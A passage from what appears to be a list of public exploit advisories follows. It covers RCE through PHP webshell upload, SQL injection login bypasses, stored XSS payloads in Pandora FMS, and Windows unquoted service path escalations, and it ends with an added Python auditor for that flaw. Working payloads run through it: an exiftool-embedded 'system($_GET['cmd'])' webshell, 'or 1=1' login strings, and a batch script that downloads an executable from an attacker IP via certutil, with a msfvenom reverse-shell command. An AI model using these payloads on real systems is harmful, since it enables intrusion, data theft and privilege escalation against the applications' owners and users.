# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Select Measurement Settings and click on "Set Measurement Parts".
Step 3: Create any php payload locally on your system. (I used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php)
Step 4: Fill the required details and upload the php payload you created using the image upload field.
Step 5: Select Measurement Settings and click on "View/Edit Measurement Parts".
Step 6: Start netcat listener.
Step 7: Use the search filter to find your measurement and click on "edit" to trigger the php payload.

========================== OR ==========================

Step 1: Embed an image with the code "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg"
Step 2: Rename the malicious image to include a ".php" extension. Example ( mv r0b0t.jpg r0b0t.jpg.php )
Step 3: Log in to the CMS with any valid user credentials.
Step 4: Select Measurement Settings and click on "Set Measurement Parts".
Step 5: Fill the required details and upload the malicious image you created using the image upload field.
Step 6: Select Measurement Settings and click on "View/Edit Measurement Parts".
Step 7: Use the search filter to find your measurement and click on "edit" to edit details.
Step 8: Right click on the broken image and copy image location.
Step 9: Paste image location in browser and you will have RCE. ( http://localhost/img/part/r0b0t.jpg.php?cmd=cat /etc/passwd )
  20. # Exploit Title: Medical Center Portal Management System 1.0 - 'login' SQL Injection
# Dork: N/A
# Date: 2020-11-26
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux

# POC:
# 1)
# http://localhost/medic/pages/login.php
#

POST /medic/pages/processlogin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://localhost
Connection: close
Referer: http://localhost/medic/pages/login.php
Cookie: PHPSESSID=ef7226c5aa187ed19ce1815df30e079e
Upgrade-Insecure-Requests: 1

user=1%27+or+1%3D1%23&password=1%27+or+1%3D1%23&btnlogin=
  21. # Exploit Title: Social Networking Site - Authentication Bypass (SQli)
# Date: 2020-11-17
# Exploit Author: gh1mau
# Email: gh1mau.rulez@gmail.com
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://www.sourcecodester.com/php/14601/social-networking-site-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14601&title=Social+Networking+Site+in+PHP%2FMySQLi+with+Full+Source+Code
# Software Release Date: November 17, 2020
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)

Vulnerable File:
----------------
/signin_form.php

Vulnerable Code:
-----------------
Entry point:
line 7: $email=$_POST['email'];
line 8: $password=$_POST['password'];

Exit point:
line 10: $result = mysqli_query($con,"SELECT * FROM user WHERE email = '$email' and password='$password'");

Vulnerable Issue:
-----------------
Attacker could bypass the authentication using simple sqli login bypass payload

username: gh1mau@gh1mau.com
password: ' or '1'='1
  22. # Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
# Date: 11-14-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 749
# Tested on: Ubuntu 18.04

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Edit OS" functionality of Pandora FMS.
# Vulnerable Parameters : name, description
# Patch Link : https://github.com/pandorafms/pandorafms/commit/58f521e8b570802fa33c75f99586e5b01b06731b

#POC
POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1

name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&icon=0&id_os=0&action=save&update_button=Create

############################################################################################################

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Private Enterprise Numbers" functionality of Pandora FMS.
# Vulnerable Parameters : manufacturer, description
# Patch Link : https://github.com/pandorafms/pandorafms/commit/b9b94e1382f6e340fd9f3136972cca4373f00eb0

#POC
POST /pandora_console/ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------195778570630678476283866516641
Content-Length: 846
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=templates&sec2=godmode/modules/private_enterprise_numbers
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3

-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="is_new"

1
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="page"

godmode/modules/private_enterprise_numbers
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="method"

add
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="pen"

123
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="manufacturer"

<img src=a onerror=alert(1)>
-----------------------------195778570630678476283866516641
Content-Disposition: form-data; name="description"

<img src=a onerror=alert(1)>
-----------------------------195778570630678476283866516641--

############################################################################################################

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Module Template Management" functionality of Pandora FMS.
# Vulnerable Parameters : name, description
# Patch Link : https://github.com/pandorafms/pandorafms/commit/e833c318a5a91d6d709a5b266c1245261b4c0e70

# POC
POST /pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1

id_np=0&valid-pen=1%2C2%2C4%2C9%2C11%2C63%2C111%2C116%2C123%2C171%2C173%2C188%2C207%2C674%2C2021%2C2636%2C3375%2C3861%2C6486%2C6574%2C8072%2C10002%2C12356%2C13062%2C14988%2C19464%2C41112%2C52627%2C53526%2C&name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&pen=&action_button=Create
  23. # Exploit Title: Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path
# Discovery by: Emmanuel Lujan
# Discovery Date: 2020-11-26
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
# Tested Version: 1.0.0.3
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Home Premium x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
GREGService    GREGService    C:\Program Files (x86)\Acer\Registration\GREGsvc.exe    Auto

# Service info:

C:\>sc qc GregService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GREGService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : GREGService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  24. #Exploit Title: EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-27-11
#Vendor : SEIKO EPSON Corp
#Version : EPSON_PM_RPCV4_06 8.0
#Vendor Homepage : https://epson.com
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============

C:\>sc qc EPSON_PM_RPCV4_06
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: EPSON_PM_RPCV4_06
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : EPSON V3 Service4(06)
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
  25. # Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
# Discovery by: Jok3r
# Discovery Date: 2020-09-14
# Vendor Homepage: https://home.pearsonvue.com/
# Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm
# Tested Version: 2.3.1911
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

#Description:
The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center's server. The VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on the "\Pearson VUE\" directory, which is writable by everyone, so that an unauthorized local user can escalate privileges to the VUEService user, which has administrative rights.

# Detection of unquoted service path:

C:\Users\VUEService>wmic service get name, pathname, displayname, startmode| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |findstr /i /v """
VUE Application Wrapper    VUEApplicationWrapper    C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe    Auto

C:\Users\VUEService>sc qc VUEApplicationWrapper
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VUEApplicationWrapper
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Pearson VUE\VUE TestingSystem\bin\VUEWrapper.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VUE Application Wrapper
        DEPENDENCIES       : lanmanworkstation
        SERVICE_START_NAME : .\VUEService

#Detection of insecure file permissions:

PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"

    Directory: C:\

Path           Owner                    Access
----           -----                    ------
Pearson Vue    BUILTIN\Administrators   Everyone Allow  FullControl...

#Exploit code:

ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc VUEApplicationWrapper
powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
ECHO [+] Enumeration was completed successfully.
::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > VUE.exe
ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted.
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\PearsonVUE\VUE.exe"
ECHO [*] Downloading VUE executable...
PAUSE
IF EXIST "C:\Pearson VUE\VUE.exe" (
    ECHO [+] The download was successful.
) ELSE (
    ECHO [-] The download was unsuccessful.
    PAUSE
)
ECHO [!] If you continue, system will be rebooted.
PAUSE
shutdown /r /t 0
::code end
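The three unquoted service path posts above (GREGService, EPSON_PM_RPCV4_06 and VUEApplicationWrapper) all come down to the same check on `sc qc` output. As an added audit helper that is not part of any of those advisories, the following Python parses that output (English labels and the Spanish ones shown in the EPSON post), flags a service whose unquoted binary path contains spaces, lists the locations Windows would probe before the real executable (the directories whose ACLs need review), and produces the quoted replacement path. `SAMPLE_SC_QC` is a constructed sample modelled on the GREGService output; the function names are this example's own.

```python
import re

# Labels used by 'sc qc' for the two fields we need: English plus the
# Spanish localisation seen in the EPSON output above.
_SERVICE_LABELS = ("SERVICE_NAME", "NOMBRE_SERVICIO")
_BINPATH_LABELS = ("BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO")

# Constructed sample of 'sc qc' output, modelled on the GREGService post.
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GREGService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\Acer\\Registration\\GREGsvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : GREGService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(output):
    """Return (service_name, binary_path) from the text of 'sc qc <name>'.
    Splitting on the first ':' keeps the drive-letter colon inside the value."""
    name = path = None
    for line in output.splitlines():
        label, sep, value = line.partition(":")
        if not sep:
            continue
        label, value = label.strip(), value.strip()
        if label in _SERVICE_LABELS:
            name = value
        elif label in _BINPATH_LABELS:
            path = value
    return name, path


def executable_part(binary_path):
    """The executable portion of BINARY_PATH_NAME without its arguments.
    A quoted path ends at the closing quote; an unquoted one is read up to
    the first '.exe' token, which is how services are normally registered."""
    p = binary_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end] if end > 0 else p[1:]
    m = re.match(r"(?i)(.+?\.exe)(?=\s|$)", p)
    return m.group(1) if m else p


def is_unquoted_with_spaces(binary_path):
    """True for the vulnerable shape: an unquoted path whose executable
    portion contains at least one space."""
    p = binary_path.strip()
    return not p.startswith('"') and " " in executable_part(p)


def candidate_paths(binary_path):
    """Files CreateProcess tries, in order, for an unquoted path with spaces:
    each space-delimited prefix with '.exe' appended, then the full path.
    Their parent directories are what a defender must check for write access."""
    exe = executable_part(binary_path)
    if binary_path.strip().startswith('"'):
        return [exe]
    parts = exe.split(" ")
    cands = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    cands.append(exe)
    return cands


def quoted_fix(binary_path):
    """Corrected BINARY_PATH_NAME: executable wrapped in double quotes, any
    trailing arguments preserved (the value to set via 'sc config ... binPath=')."""
    p = binary_path.strip()
    if p.startswith('"'):
        return p
    exe = executable_part(p)
    return '"%s"%s' % (exe, p[len(exe):])


def audit(output):
    """Parse one 'sc qc' dump and summarise the finding as a dict."""
    name, path = parse_sc_qc(output)
    vulnerable = path is not None and is_unquoted_with_spaces(path)
    return {
        "service": name,
        "binary_path": path,
        "unquoted_with_spaces": vulnerable,
        "candidates": candidate_paths(path) if vulnerable else [],
        "fix": quoted_fix(path) if vulnerable else path,
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_SC_QC).items():
        print("%-22s %s" % (key, value))
```

Feeding it the real output of `sc qc <service>` for every auto-start service gives the same list the wmic one-liners above produce, plus the exact replacement path for each finding.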